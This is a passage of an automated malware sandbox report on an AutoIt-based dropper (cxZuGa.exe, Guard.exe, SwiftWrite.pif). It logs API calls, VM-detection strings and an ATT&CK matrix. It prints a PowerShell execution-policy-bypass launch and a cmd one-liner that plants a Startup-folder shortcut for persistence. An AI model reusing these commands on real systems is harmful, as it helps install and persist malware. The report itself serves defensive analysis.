Source: C:\Users\Public\Guard.exeAPI coverage: 6.1 %
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifAPI coverage: 4.5 %
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1492Thread sleep time: -10145709240540247s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2276Thread sleep time: -922337203685477s >= -30000sJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7096Thread sleep count: 5543 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 7096Thread sleep count: 4281 > 30Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1848Thread sleep time: -20291418481080494s >= -30000sJump to behavior
Source: C:\Users\user\Desktop\cxZuGa.exeCode function: 0_2_00007FF7EC19C7C0 lstrlenW,GetFileAttributesW,FindFirstFileW,FindClose,0_2_00007FF7EC19C7C0
Source: C:\Users\user\Desktop\cxZuGa.exeCode function: 0_2_00007FF7EC162F50 FindFirstFileExW,0_2_00007FF7EC162F50
Source: C:\Users\user\Desktop\cxZuGa.exeCode function: 0_2_00007FF7EC1AA874 FindFirstFileW,Sleep,FindNextFileW,FindClose,0_2_00007FF7EC1AA874
Source: C:\Users\user\Desktop\cxZuGa.exeCode function: 0_2_00007FF7EC1AA350 FindFirstFileW,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,0_2_00007FF7EC1AA350
Source: C:\Users\user\Desktop\cxZuGa.exeCode function: 0_2_00007FF7EC1A6428 FindFirstFileW,FindNextFileW,FindClose,0_2_00007FF7EC1A6428
Source: C:\Users\user\Desktop\cxZuGa.exeCode function: 0_2_00007FF7EC1AA4F8 FindFirstFileW,FindNextFileW,FindClose,FindClose,FindFirstFileW,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,0_2_00007FF7EC1AA4F8
Source: C:\Users\user\Desktop\cxZuGa.exeCode function: 0_2_00007FF7EC19BC70 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00007FF7EC19BC70
Source: C:\Users\user\Desktop\cxZuGa.exeCode function: 0_2_00007FF7EC19B7C0 FindFirstFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,0_2_00007FF7EC19B7C0
Source: C:\Users\user\Desktop\cxZuGa.exeCode function: 0_2_00007FF7EC1A71F4 FindFirstFileW,FindClose,0_2_00007FF7EC1A71F4
Source: C:\Users\user\Desktop\cxZuGa.exeCode function: 0_2_00007FF7EC1A72A8 FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,FileTimeToSystemTime,0_2_00007FF7EC1A72A8
Source: C:\Users\Public\Guard.exeCode function: 6_2_00C94005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,6_2_00C94005
Source: C:\Users\Public\Guard.exeCode function: 6_2_00C9494A GetFileAttributesW,FindFirstFileW,FindClose,6_2_00C9494A
Source: C:\Users\Public\Guard.exeCode function: 6_2_00C9C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,6_2_00C9C2FF
Source: C:\Users\Public\Guard.exeCode function: 6_2_00C9CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,6_2_00C9CD9F
Source: C:\Users\Public\Guard.exeCode function: 6_2_00C9CD14 FindFirstFileW,FindClose,6_2_00C9CD14
Source: C:\Users\Public\Guard.exeCode function: 6_2_00C9F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,6_2_00C9F5D8
Source: C:\Users\Public\Guard.exeCode function: 6_2_00C9F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,6_2_00C9F735
Source: C:\Users\Public\Guard.exeCode function: 6_2_00C9FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,6_2_00C9FA36
Source: C:\Users\Public\Guard.exeCode function: 6_2_00C93CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,6_2_00C93CE2
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 11_2_00654005 FindFirstFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,11_2_00654005
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 11_2_0065494A GetFileAttributesW,FindFirstFileW,FindClose,11_2_0065494A
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 11_2_0065C2FF FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,11_2_0065C2FF
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 11_2_0065CD14 FindFirstFileW,FindClose,11_2_0065CD14
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 11_2_0065CD9F FindFirstFileW,FindClose,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToLocalFileTime,FileTimeToSystemTime,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,__swprintf,11_2_0065CD9F
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 11_2_0065F5D8 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,GetFileAttributesW,SetFileAttributesW,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,11_2_0065F5D8
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 11_2_0065F735 SetCurrentDirectoryW,FindFirstFileW,FindFirstFileW,_wcscmp,_wcscmp,FindNextFileW,FindClose,FindFirstFileW,SetCurrentDirectoryW,_wcscmp,_wcscmp,SetCurrentDirectoryW,SetCurrentDirectoryW,FindNextFileW,FindClose,FindClose,11_2_0065F735
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 11_2_0065FA36 FindFirstFileW,Sleep,_wcscmp,_wcscmp,FindNextFileW,FindClose,11_2_0065FA36
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 11_2_00653CE2 FindFirstFileW,DeleteFileW,DeleteFileW,MoveFileW,DeleteFileW,FindNextFileW,FindClose,FindClose,11_2_00653CE2
Source: C:\Users\user\Desktop\cxZuGa.exeCode function: 0_2_00007FF7EC141D80 GetVersionExW,GetCurrentProcess,IsWow64Process,GetSystemInfo,GetSystemInfo,FreeLibrary,0_2_00007FF7EC141D80
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: powershell.exe, 00000004.00000002.2132414313.000002366B563000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW6
Source: wscript.exe, 0000000A.00000002.2250642773.000001C85E0A1000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: SwiftWrite.pif, 0000000B.00000002.3266574915.0000000003AD3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dllP^
Source: powershell.exe, 00000004.00000002.2097758108.00000236535C4000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: HgfS6
Source: powershell.exe, 00000004.00000002.2132414313.000002366B595000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#4&224f42ef&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}U
Source: Guard.exe, 00000006.00000002.3266463703.0000000003AC3000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifAPI call chain: ExitProcess graph end node
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifAPI call chain: ExitProcess graph end node
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information queried: ProcessInformationJump to behavior
Source: C:\Users\user\Desktop\cxZuGa.exeCode function: 0_2_00007FF7EC1B0A00 BlockInput,0_2_00007FF7EC1B0A00
Source: C:\Users\user\Desktop\cxZuGa.exeCode function: 0_2_00007FF7EC1237B0 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00007FF7EC1237B0
Source: C:\Users\user\Desktop\cxZuGa.exeCode function: 0_2_00007FF7EC145BC0 GetLastError,IsDebuggerPresent,OutputDebugStringW,0_2_00007FF7EC145BC0
Source: C:\Users\user\Desktop\cxZuGa.exeCode function: 0_2_00007FF7EC126D1C LoadLibraryA,GetProcAddress,0_2_00007FF7EC126D1C
Source: C:\Users\user\Desktop\cxZuGa.exeCode function: 0_2_00007FF7EC18CDC4 GetProcessHeap,HeapAlloc,InitializeAcl,0_2_00007FF7EC18CDC4
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess token adjusted: DebugJump to behavior
Source: C:\Users\user\Desktop\cxZuGa.exeCode function: 0_2_00007FF7EC15AF58 RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF7EC15AF58
Source: C:\Users\user\Desktop\cxZuGa.exeCode function: 0_2_00007FF7EC168FE4 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,0_2_00007FF7EC168FE4
Source: C:\Users\user\Desktop\cxZuGa.exeCode function: 0_2_00007FF7EC1459C8 SetUnhandledExceptionFilter,0_2_00007FF7EC1459C8
Source: C:\Users\user\Desktop\cxZuGa.exeCode function: 0_2_00007FF7EC1457E4 IsProcessorFeaturePresent,RtlCaptureContext,RtlLookupFunctionEntry,RtlVirtualUnwind,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,0_2_00007FF7EC1457E4
Source: C:\Users\Public\Guard.exeCode function: 6_2_00C5A385 SetUnhandledExceptionFilter,UnhandledExceptionFilter,6_2_00C5A385
Source: C:\Users\Public\Guard.exeCode function: 6_2_00C5A354 SetUnhandledExceptionFilter,6_2_00C5A354
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 11_2_0061A354 SetUnhandledExceptionFilter,11_2_0061A354
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 11_2_0061A385 SetUnhandledExceptionFilter,UnhandledExceptionFilter,11_2_0061A385

HIPS / PFW / Operating System Protection Evasion

barindex
Bypasses PowerShell execution policy
Source: C:\Users\user\Desktop\cxZuGa.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe powershell.exe -ExecutionPolicy Bypass -File "C:\Users\Public\PublicProfile.ps1"
Source: C:\Users\user\Desktop\cxZuGa.exeCode function: 0_2_00007FF7EC18CE68 LogonUserW,DuplicateTokenEx,CloseHandle,OpenWindowStationW,GetProcessWindowStation,SetProcessWindowStation,OpenDesktopW,wcscpy,LoadUserProfileW,CreateEnvironmentBlock,CreateProcessAsUserW,UnloadUserProfile,CloseWindowStation,CloseDesktop,SetProcessWindowStation,CloseHandle,DestroyEnvironmentBlock,0_2_00007FF7EC18CE68
Source: C:\Users\user\Desktop\cxZuGa.exeCode function: 0_2_00007FF7EC1237B0 GetCurrentDirectoryW,IsDebuggerPresent,GetFullPathNameW,SetCurrentDirectoryW,MessageBoxA,SetCurrentDirectoryW,GetForegroundWindow,ShellExecuteW,0_2_00007FF7EC1237B0
Source: C:\Users\user\Desktop\cxZuGa.exeCode function: 0_2_00007FF7EC144514 GetForegroundWindow,FindWindowW,IsIconic,ShowWindow,SetForegroundWindow,GetWindowThreadProcessId,GetCurrentThreadId,GetWindowThreadProcessId,AttachThreadInput,AttachThreadInput,AttachThreadInput,SetForegroundWindow,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,MapVirtualKeyW,keybd_event,SetForegroundWindow,AttachThreadInput,AttachThreadInput,AttachThreadInput,0_2_00007FF7EC144514
Source: C:\Users\user\Desktop\cxZuGa.exeCode function: 0_2_00007FF7EC1B4C58 GetForegroundWindow,GetDesktopWindow,GetWindowRect,mouse_event,GetCursorPos,mouse_event,0_2_00007FF7EC1B4C58
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Users\Public\Guard.exe "C:\Users\Public\Guard.exe" C:\Users\Public\Secure.au3 Jump to behavior
Source: C:\Windows\System32\wscript.exeProcess created: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif "C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pif" "C:\Users\user\AppData\Local\WordGenius Technologies\G"Jump to behavior
Source: C:\Users\Public\Guard.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\swiftwrite.url" & echo url="c:\users\user\appdata\local\wordgenius technologies\swiftwrite.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\swiftwrite.url" & exit
Source: C:\Users\Public\Guard.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /k echo [internetshortcut] > "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\swiftwrite.url" & echo url="c:\users\user\appdata\local\wordgenius technologies\swiftwrite.js" >> "c:\users\user\appdata\roaming\microsoft\windows\start menu\programs\startup\swiftwrite.url" & exitJump to behavior
Source: C:\Users\user\Desktop\cxZuGa.exeCode function: 0_2_00007FF7EC18C5FC GetSecurityDescriptorDacl,GetAclInformation,GetLengthSid,GetAce,AddAce,GetLengthSid,GetLengthSid,CopySid,AddAce,SetSecurityDescriptorDacl,SetUserObjectSecurity,0_2_00007FF7EC18C5FC
Source: C:\Users\user\Desktop\cxZuGa.exeCode function: 0_2_00007FF7EC18D540 AllocateAndInitializeSid,CheckTokenMembership,FreeSid,0_2_00007FF7EC18D540
Source: cxZuGa.exe, SwiftWrite.pif.6.dr, Guard.exe.1.drBinary or memory string: Run Script:AutoIt script files (*.au3, *.a3x)*.au3;*.a3xAll files (*.*)*.*au3#include depth exceeded. Make sure there are no recursive includesError opening the file>>>AUTOIT SCRIPT<<<Bad directive syntax errorUnterminated stringCannot parse #includeUnterminated group of commentsONOFF0%d%dShell_TrayWndREMOVEKEYSEXISTSAPPENDblankinfoquestionstopwarning
Source: cxZuGa.exe, Guard.exe, SwiftWrite.pifBinary or memory string: Shell_TrayWnd
Source: C:\Users\user\Desktop\cxZuGa.exeCode function: 0_2_00007FF7EC15FD20 cpuid 0_2_00007FF7EC15FD20
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
Source: C:\Users\user\Desktop\cxZuGa.exeCode function: 0_2_00007FF7EC182BA0 GetLocalTime,0_2_00007FF7EC182BA0
Source: C:\Users\user\Desktop\cxZuGa.exeCode function: 0_2_00007FF7EC182BCF GetUserNameW,0_2_00007FF7EC182BCF
Source: C:\Users\user\Desktop\cxZuGa.exeCode function: 0_2_00007FF7EC162650 _get_daylight,_get_daylight,_get_daylight,GetTimeZoneInformation,WideCharToMultiByte,WideCharToMultiByte,0_2_00007FF7EC162650
Source: C:\Users\user\Desktop\cxZuGa.exeCode function: 0_2_00007FF7EC141D80 GetVersionExW,GetCurrentProcess,IsWow64Process,GetSystemInfo,GetSystemInfo,FreeLibrary,0_2_00007FF7EC141D80
Source: C:\Windows\System32\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
Source: cxZuGa.exe, 00000000.00000003.2060153983.0000017C03FEE000.00000004.00000020.00020000.00000000.sdmp, cxZuGa.exe, 00000000.00000003.2060234816.0000017C03FEE000.00000004.00000020.00020000.00000000.sdmp, cxZuGa.exe, 00000000.00000003.2060251000.0000017C03FEE000.00000004.00000020.00020000.00000000.sdmp, cxZuGa.exe, 00000000.00000002.2060809307.0000017C03FEF000.00000004.00000020.00020000.00000000.sdmp, cxZuGa.exe, 00000000.00000003.2060085372.0000017C03FEE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \??\C:\Users\Public\Guard.exe
Source: powershell.exe, 00000004.00000002.2097758108.0000023653288000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Users\Public\Guard.exe
Source: Guard.exe, 00000006.00000002.3264835640.0000000000E38000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: \Device\HarddiskVolume3\Users\Public\Guard.exe
Source: powershell.exe, 00000004.00000002.2097758108.0000023653288000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Public\Guard.exe
Source: powershell.exe, 00000004.00000002.2131489249.000002366B392000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2132414313.000002366B540000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2132414313.000002366B575000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000006.00000003.2107810645.0000000000BF0000.00000004.00000800.00020000.00000000.sdmp, Guard.exe, 00000006.00000003.2096909845.0000000000BF0000.00000004.00000800.00020000.00000000.sdmp, Guard.exe, 00000006.00000003.2107909255.0000000000BF0000.00000004.00000800.00020000.00000000.sdmp, Guard.exe, 00000006.00000003.2122385003.0000000004491000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000006.00000003.2108017264.0000000000BF0000.00000004.00000800.00020000.00000000.sdmp, Guard.exe, 00000006.00000003.2107517789.0000000004491000.00000004.00000020.00020000.00000000.sdmp, Guard.exe, 00000006.00000003.2122300103.0000000000BF0000.00000004.00000800.00020000.00000000.sdmp, Guard.exe, 00000006.00000003.2108181509.0000000000BF0000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: Guard.exe
Source: cxZuGa.exe, 00000000.00000002.2060480429.0000017C03FC9000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2097758108.00000236530A8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2131489249.000002366B392000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2132414313.000002366B595000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2131489249.000002366B31D000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.2097758108.0000023653288000.00000004.00000800.00020000.00000000.sdmp, Guard.exe, Guard.exe, 00000006.00000002.3264333376.00000000009CE000.00000004.00000010.00020000.00000000.sdmpBinary or memory string: C:\Users\Public\Guard.exe
Source: powershell.exe, 00000004.00000002.2132414313.000002366B595000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: "C:\Users\Public\Guard.exe
Source: powershell.exe, 00000004.00000002.2097758108.0000023653288000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: \Users\Public\Guard.exe
Source: SwiftWrite.pifBinary or memory string: WIN_81
Source: SwiftWrite.pifBinary or memory string: WIN_XP
Source: SwiftWrite.pifBinary or memory string: WIN_XPe
Source: SwiftWrite.pifBinary or memory string: WIN_VISTA
Source: cxZuGa.exeBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_11WIN_10WIN_2022WIN_2019WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\AppearanceUSERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
Source: SwiftWrite.pifBinary or memory string: WIN_7
Source: SwiftWrite.pifBinary or memory string: WIN_8
Source: Guard.exe.1.drBinary or memory string: %.3d%S%M%H%m%Y%jX86IA64X64WIN32_NTWIN_10WIN_2016WIN_81WIN_2012R2WIN_2012WIN_8WIN_2008R2WIN_7WIN_2008WIN_VISTAWIN_2003WIN_XPeWIN_XPInstallLanguageSYSTEM\CurrentControlSet\Control\Nls\LanguageSchemeLangIDControl Panel\Appearance3, 3, 14, 3USERPROFILEUSERDOMAINUSERDNSDOMAINGetSystemWow64DirectoryWSeDebugPrivilege:winapistdcallubyte
Source: C:\Users\user\Desktop\cxZuGa.exeCode function: 0_2_00007FF7EC1B4074 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,0_2_00007FF7EC1B4074
Source: C:\Users\user\Desktop\cxZuGa.exeCode function: 0_2_00007FF7EC1B3940 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,listen,WSAGetLastError,closesocket,0_2_00007FF7EC1B3940
Source: C:\Users\Public\Guard.exeCode function: 6_2_00CA696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,6_2_00CA696E
Source: C:\Users\Public\Guard.exeCode function: 6_2_00CA6E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,6_2_00CA6E32
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 11_2_0066696E socket,WSAGetLastError,bind,listen,WSAGetLastError,closesocket,11_2_0066696E
Source: C:\Users\user\AppData\Local\WordGenius Technologies\SwiftWrite.pifCode function: 11_2_00666E32 socket,WSAGetLastError,bind,WSAGetLastError,closesocket,11_2_00666E32

Mitre Att&ck Matrix

ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
Gather Victim Identity Information1
Scripting		2
Valid Accounts		2
Native API		1
Scripting		1
Exploitation for Privilege Escalation		1
Disable or Modify Tools		21
Input Capture		2
System Time Discovery		Remote Services1
Archive Collected Data		12
Ingress Tool Transfer		Exfiltration Over Other Network Medium1
System Shutdown/Reboot
CredentialsDomainsDefault Accounts12
Command and Scripting Interpreter		1
DLL Side-Loading		1
DLL Side-Loading		1
Deobfuscate/Decode Files or Information		LSASS Memory1
Account Discovery		Remote Desktop Protocol21
Input Capture		1
Encrypted Channel		Exfiltration Over BluetoothNetwork Denial of Service
Email AddressesDNS ServerDomain Accounts3
PowerShell		2
Valid Accounts		2
Valid Accounts		2
Obfuscated Files or Information		Security Account Manager2
File and Directory Discovery		SMB/Windows Admin Shares3
Clipboard Data		2
Non-Application Layer Protocol		Automated ExfiltrationData Encrypted for Impact
Employee NamesVirtual Private ServerLocal AccountsCron2
Registry Run Keys / Startup Folder		21
Access Token Manipulation		1
DLL Side-Loading		NTDS26
System Information Discovery		Distributed Component Object ModelInput Capture22
Application Layer Protocol		Traffic DuplicationData Destruction
Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon Script12
Process Injection		311
Masquerading		LSA Secrets41
Security Software Discovery		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC Scripts2
Registry Run Keys / Startup Folder		2
Valid Accounts		Cached Domain Credentials21
Virtualization/Sandbox Evasion		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items21
Virtualization/Sandbox Evasion		DCSync3
